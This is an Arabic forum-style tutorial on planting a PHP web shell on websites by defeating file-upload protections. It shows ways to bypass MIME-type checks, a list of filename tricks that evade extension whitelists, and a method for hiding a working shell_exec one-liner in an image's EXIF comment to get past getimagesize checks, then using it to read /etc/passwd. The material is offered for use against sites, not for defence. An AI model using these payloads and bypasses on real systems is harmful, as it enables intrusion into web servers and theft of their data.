عند رفع الشل عادة المواقع تكون لديها تدابير امنية تمنع دالك
و كل إجراء أمني لديه طريقة تخطي المناسبة لدالك سوف اشرح طريقة الرفع حسب الحماية المستعملة
الحماية حسب نوع الملف
كود PHP:
if($_FILES['userfile']['type'] != "image/jpg")
لتخطي هده الحماية نستعمل تامبر داتا
الحماية باستخدام اللائحة البيضاء
وهو جدول في ملف البي اش بي يحتوي على الامتدادات المسموحة
كود PHP:
$valid_file_extensions = array(".jpg", ".jpeg", ".gif", ".png");
لتخطي هادا النوع من الحمايات نتلاعب ياسم الملف
مثلا | اقتباس | | | | | | | | |
shell.jpg.php
shell.jpg.PhP
shell.php.xxxjpg
shell.php;.jpg
shell.php%0delete0.jpg
shell.php.test
.phtml
.php3/.php4/.php5 | | | | | |
الحماية باستخدام الدوال الخاصة بالصور
في هده الحالة المبرمج يستعمل دالة خاصة بالصور مثلا الدالة التي ترجع قياسات الصورة للتاكد ان الملف الدي تم رفعه هو فعلا صورة
كود PHP:
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
في هده الحالة كل الطرق السابقة سوف تفشل و الحل الوحيد هو رفع صورة حقيقيقة
لذالك نذهب الى برنامج الرسام و ننشئ صورة صغيرة بحجم الايقونة ونحفظها في سطح المكتب
نحمل برنامج لتعديل الميتا داتا الخاص بالصورة مثل GIMPاو exif pilot
انا سوف اشرح exif pilot
http://exifpilot.com/ الموقع الرسمي للبرنامج
بعد التثبيث نفتح الصورة بالبرامج نضع الكود الدي يمثل الشل المجهري في التعليق
كود PHP:
<?if($_GET['lol']){echo"<pre>".shell_exec($_GET["lol"]);}?>
كما هو موضح في الصورة
الكود معناه ادا وجد متغير او بارميتر اسمه لول نفد مايحتويه المتغير
ثم نرسل امر فتح الملف etc/passwd
| اقتباس | | | | | |
و الاستغلال يكون بهده الطريقة
لا ادري لمادا لم ارى اي عربي يقوم بهده الطريقة هل يريدونها برايفت ؟؟ لاادري
على كل حال اتمنى ان اكون قد افدتك اخي